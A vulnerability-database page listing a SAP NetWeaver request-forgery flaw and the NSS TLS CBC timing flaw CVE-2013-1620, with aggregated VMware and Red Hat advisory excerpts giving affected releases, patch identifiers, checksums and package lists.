VARIoT IoT vulnerabilities database
| VAR-201302-0413 | No CVE | SAP NetWeaver MMC Request forgery vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious actions in the target user context, such as executing shell commands
| VAR-201302-0332 | CVE-2013-1620 | Mozilla Network Security Services of TLS Vulnerabilities that trigger identity attacks and plain text recovery attacks |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169. This vulnerability CVE-2013-0169 And related issues.A third party may be able to trigger identification and plain text recovery attacks through statistical analysis of timing data for crafted packets. Mozilla Network Security Services (NSS) is prone to an information disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. Relevant releases
VMware ESX 4.1 without patch ESX410-201312001
3. Problem Description
a. Update to ESX service console kernel
The ESX service console kernel is updated to resolve multiple
security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2012-2372, CVE-2012-3552, CVE-2013-2147,
CVE-2013-2164, CVE-2013-2206, CVE-2013-2224, CVE-2013-2234,
CVE-2013-2237, CVE-2013-2232 to these issues.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======== ======= =================
ESXi any ESXi not applicable
ESX 4.1 ESX ESX410-201312401-SG
ESX 4.0 ESX patch pending
b.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2013-0791 and CVE-2013-1620 to these
issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======== ======= =================
ESXi any ESXi not applicable
ESX 4.1 ESX ESX410-201312403-SG
ESX 4.0 ESX patch pending
4. Solution
Please review the patch/release notes for your product and
version and verify the checksum of your downloaded file.
ESX 4.1
-------
File: ESX410-201312001.zip
md5sum: c35763a84db169dd0285442d4129cc18
sha1sum: ee8e1b8d2d383422ff0dde04749c5d89e77d8e40
http://kb.vmware.com/kb/2061209
ESX410-201312001 contains ESX410-201312401-SG and ESX410-201312403-SG. References
--- kernel (service console) ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2372
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3552
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2147
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2164
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2234
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2232
--- NSPR and NSS (service console) ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620
- -------------------------------------------------------------------------
6. Change log
2013-12-05 VMSA-2013-0015
Initial security advisory in conjunction with the release of ESX 4.1
patches on 2013-12-05. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2013 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: nss, nss-util, nss-softokn, and nspr security update
Advisory ID: RHSA-2013:1144-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1144.html
Issue date: 2013-08-07
CVE Names: CVE-2013-0791 CVE-2013-1620
=====================================================================
1. Summary:
Updated nss, nss-util, nss-softokn, and nspr packages that fix two security
issues, various bugs, and add enhancements are now available for Red Hat
Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
Network Security Services (NSS) is a set of libraries designed to support
the cross-platform development of security-enabled client and server
applications. Netscape Portable Runtime (NSPR) provides platform
independence for non-GUI operating system facilities. nss-softokn provides
an NSS softoken cryptographic module.
It was discovered that NSS leaked timing information when decrypting
TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites
were used. A remote attacker could possibly use this flaw to retrieve plain
text from the encrypted packets by using a TLS/SSL or DTLS server as a
padding oracle. (CVE-2013-1620)
An out-of-bounds memory read flaw was found in the way NSS decoded certain
certificates. If an application using NSS decoded a malformed certificate,
it could cause the application to crash. (CVE-2013-0791)
Red Hat would like to thank the Mozilla project for reporting
CVE-2013-0791. Upstream acknowledges Ambroz Bizjak as the original reporter
of CVE-2013-0791.
This update also fixes the following bugs:
* The RHBA-2013:0445 update (which upgraded NSS to version 3.14) prevented
the use of certificates that have an MD5 signature. This caused problems in
certain environments. With this update, certificates that have an MD5
signature are once again allowed. To prevent the use of certificates that
have an MD5 signature, set the "NSS_HASH_ALG_SUPPORT" environment variable
to "-MD5". (BZ#957603)
* Previously, the sechash.h header file was missing, preventing certain
source RPMs (such as firefox and xulrunner) from building. (BZ#948715)
* A memory leak in the nssutil_ReadSecmodDB() function has been fixed.
(BZ#984967)
In addition, the nss package has been upgraded to upstream version 3.14.3,
the nss-util package has been upgraded to upstream version 3.14.3, the
nss-softokn package has been upgraded to upstream version 3.14.3, and the
nspr package has been upgraded to upstream version 4.9.5. These updates
provide a number of bug fixes and enhancements over the previous versions.
(BZ#927157, BZ#927171, BZ#927158, BZ#927186)
Users of NSS, NSPR, nss-util, and nss-softokn are advised to upgrade to
these updated packages, which fix these issues and add these enhancements.
After installing this update, applications using NSS, NSPR, nss-util, or
nss-softokn must be restarted for this update to take effect.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
908234 - CVE-2013-1620 nss: TLS CBC padding timing attack
927157 - [RFE][RHEL6] Rebase to nss-3.14.3 to fix the lucky-13 issue [6.4.z]
927158 - Rebase to nss-softokn 3.14.3 to fix the lucky-13 issue [6.4.z]
927171 - Rebase to nss-util 3.14.3 as part of the fix for the lucky-13 issue [rhel-6.4.z]
927186 - Rebase to nspr-4.9.5
946947 - CVE-2013-0791 Mozilla: Out-of-bounds array read in CERT_DecodeCertPackage (MFSA 2013-40)
984967 - nssutil_ReadSecmodDB() leaks memory [6.4.z]
985955 - nss-softokn: missing partial RELRO [6.4.z]
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nspr-4.9.5-2.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nss-softokn-3.14.3-3.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nss-util-3.14.3-3.el6_4.src.rpm
i386:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-sysinit-3.14.3-4.el6_4.i686.rpm
nss-tools-3.14.3-4.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
x86_64:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-4.9.5-2.el6_4.x86_64.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.x86_64.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-3.14.3-4.el6_4.x86_64.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.x86_64.rpm
nss-sysinit-3.14.3-4.el6_4.x86_64.rpm
nss-tools-3.14.3-4.el6_4.x86_64.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.x86_64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nspr-4.9.5-2.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nss-softokn-3.14.3-3.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/nss-util-3.14.3-3.el6_4.src.rpm
i386:
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
x86_64:
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.x86_64.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.x86_64.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.x86_64.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.x86_64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.x86_64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nspr-4.9.5-2.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nss-softokn-3.14.3-3.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nss-util-3.14.3-3.el6_4.src.rpm
x86_64:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-4.9.5-2.el6_4.x86_64.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.x86_64.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-3.14.3-4.el6_4.x86_64.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.x86_64.rpm
nss-sysinit-3.14.3-4.el6_4.x86_64.rpm
nss-tools-3.14.3-4.el6_4.x86_64.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.x86_64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nspr-4.9.5-2.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nss-softokn-3.14.3-3.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/nss-util-3.14.3-3.el6_4.src.rpm
x86_64:
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.x86_64.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.x86_64.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.x86_64.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.x86_64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.x86_64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/nspr-4.9.5-2.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/nss-softokn-3.14.3-3.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/nss-util-3.14.3-3.el6_4.src.rpm
i386:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-sysinit-3.14.3-4.el6_4.i686.rpm
nss-tools-3.14.3-4.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
ppc64:
nspr-4.9.5-2.el6_4.ppc.rpm
nspr-4.9.5-2.el6_4.ppc64.rpm
nspr-debuginfo-4.9.5-2.el6_4.ppc.rpm
nspr-debuginfo-4.9.5-2.el6_4.ppc64.rpm
nspr-devel-4.9.5-2.el6_4.ppc.rpm
nspr-devel-4.9.5-2.el6_4.ppc64.rpm
nss-3.14.3-4.el6_4.ppc.rpm
nss-3.14.3-4.el6_4.ppc64.rpm
nss-debuginfo-3.14.3-4.el6_4.ppc.rpm
nss-debuginfo-3.14.3-4.el6_4.ppc64.rpm
nss-devel-3.14.3-4.el6_4.ppc.rpm
nss-devel-3.14.3-4.el6_4.ppc64.rpm
nss-softokn-3.14.3-3.el6_4.ppc.rpm
nss-softokn-3.14.3-3.el6_4.ppc64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.ppc.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.ppc64.rpm
nss-softokn-devel-3.14.3-3.el6_4.ppc.rpm
nss-softokn-devel-3.14.3-3.el6_4.ppc64.rpm
nss-softokn-freebl-3.14.3-3.el6_4.ppc.rpm
nss-softokn-freebl-3.14.3-3.el6_4.ppc64.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.ppc.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.ppc64.rpm
nss-sysinit-3.14.3-4.el6_4.ppc64.rpm
nss-tools-3.14.3-4.el6_4.ppc64.rpm
nss-util-3.14.3-3.el6_4.ppc.rpm
nss-util-3.14.3-3.el6_4.ppc64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.ppc.rpm
nss-util-debuginfo-3.14.3-3.el6_4.ppc64.rpm
nss-util-devel-3.14.3-3.el6_4.ppc.rpm
nss-util-devel-3.14.3-3.el6_4.ppc64.rpm
s390x:
nspr-4.9.5-2.el6_4.s390.rpm
nspr-4.9.5-2.el6_4.s390x.rpm
nspr-debuginfo-4.9.5-2.el6_4.s390.rpm
nspr-debuginfo-4.9.5-2.el6_4.s390x.rpm
nspr-devel-4.9.5-2.el6_4.s390.rpm
nspr-devel-4.9.5-2.el6_4.s390x.rpm
nss-3.14.3-4.el6_4.s390.rpm
nss-3.14.3-4.el6_4.s390x.rpm
nss-debuginfo-3.14.3-4.el6_4.s390.rpm
nss-debuginfo-3.14.3-4.el6_4.s390x.rpm
nss-devel-3.14.3-4.el6_4.s390.rpm
nss-devel-3.14.3-4.el6_4.s390x.rpm
nss-softokn-3.14.3-3.el6_4.s390.rpm
nss-softokn-3.14.3-3.el6_4.s390x.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.s390.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.s390x.rpm
nss-softokn-devel-3.14.3-3.el6_4.s390.rpm
nss-softokn-devel-3.14.3-3.el6_4.s390x.rpm
nss-softokn-freebl-3.14.3-3.el6_4.s390.rpm
nss-softokn-freebl-3.14.3-3.el6_4.s390x.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.s390.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.s390x.rpm
nss-sysinit-3.14.3-4.el6_4.s390x.rpm
nss-tools-3.14.3-4.el6_4.s390x.rpm
nss-util-3.14.3-3.el6_4.s390.rpm
nss-util-3.14.3-3.el6_4.s390x.rpm
nss-util-debuginfo-3.14.3-3.el6_4.s390.rpm
nss-util-debuginfo-3.14.3-3.el6_4.s390x.rpm
nss-util-devel-3.14.3-3.el6_4.s390.rpm
nss-util-devel-3.14.3-3.el6_4.s390x.rpm
x86_64:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-4.9.5-2.el6_4.x86_64.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.x86_64.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.x86_64.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-3.14.3-4.el6_4.x86_64.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.x86_64.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.x86_64.rpm
nss-sysinit-3.14.3-4.el6_4.x86_64.rpm
nss-tools-3.14.3-4.el6_4.x86_64.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.x86_64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
i386:
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
ppc64:
nss-debuginfo-3.14.3-4.el6_4.ppc.rpm
nss-debuginfo-3.14.3-4.el6_4.ppc64.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.ppc.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.ppc64.rpm
s390x:
nss-debuginfo-3.14.3-4.el6_4.s390.rpm
nss-debuginfo-3.14.3-4.el6_4.s390x.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.s390.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.s390x.rpm
x86_64:
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/nspr-4.9.5-2.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/nss-softokn-3.14.3-3.el6_4.src.rpm
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/nss-util-3.14.3-3.el6_4.src.rpm
i386:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-sysinit-3.14.3-4.el6_4.i686.rpm
nss-tools-3.14.3-4.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
x86_64:
nspr-4.9.5-2.el6_4.i686.rpm
nspr-4.9.5-2.el6_4.x86_64.rpm
nspr-debuginfo-4.9.5-2.el6_4.i686.rpm
nspr-debuginfo-4.9.5-2.el6_4.x86_64.rpm
nspr-devel-4.9.5-2.el6_4.i686.rpm
nspr-devel-4.9.5-2.el6_4.x86_64.rpm
nss-3.14.3-4.el6_4.i686.rpm
nss-3.14.3-4.el6_4.x86_64.rpm
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-devel-3.14.3-4.el6_4.i686.rpm
nss-devel-3.14.3-4.el6_4.x86_64.rpm
nss-softokn-3.14.3-3.el6_4.i686.rpm
nss-softokn-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-softokn-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-devel-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-3.14.3-3.el6_4.x86_64.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.i686.rpm
nss-softokn-freebl-devel-3.14.3-3.el6_4.x86_64.rpm
nss-sysinit-3.14.3-4.el6_4.x86_64.rpm
nss-tools-3.14.3-4.el6_4.x86_64.rpm
nss-util-3.14.3-3.el6_4.i686.rpm
nss-util-3.14.3-3.el6_4.x86_64.rpm
nss-util-debuginfo-3.14.3-3.el6_4.i686.rpm
nss-util-debuginfo-3.14.3-3.el6_4.x86_64.rpm
nss-util-devel-3.14.3-3.el6_4.i686.rpm
nss-util-devel-3.14.3-3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/nss-3.14.3-4.el6_4.src.rpm
i386:
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
x86_64:
nss-debuginfo-3.14.3-4.el6_4.i686.rpm
nss-debuginfo-3.14.3-4.el6_4.x86_64.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.i686.rpm
nss-pkcs11-devel-3.14.3-4.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2013-0791.html
https://www.redhat.com/security/data/cve/CVE-2013-1620.html
https://access.redhat.com/security/updates/classification/#moderate
https://rhn.redhat.com/errata/RHBA-2013-0445.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSAo+lXlSAg2UNWIIRAi4kAJ0cXp7GWY8zHYfxviF3R6WB3cOlaACePdnV
W7Ph1SnJjPLtEtsqk+XMl68=
=LOHk
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. Relevant releases/architectures:
RHEV Hypervisor for RHEL-6 - noarch
3. The Red Hat Enterprise Virtualization Hypervisor
is a dedicated Kernel-based Virtual Machine (KVM) hypervisor.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for
the Intel 64 and AMD64 architectures with virtualization extensions.
Upgrade Note: If you upgrade the Red Hat Enterprise Virtualization
Hypervisor through the 3.2 Manager administration portal, the Host may
appear with the status of "Install Failed". If this happens, place the host
into maintenance mode, then activate it again to get the host back to an
"Up" state. (CVE-2013-1620)
It was found that the fix for CVE-2013-0167 released via RHSA-2013:0907
was incomplete. A privileged guest user could potentially use this flaw to
make the host the guest is running on unavailable to the management
server.
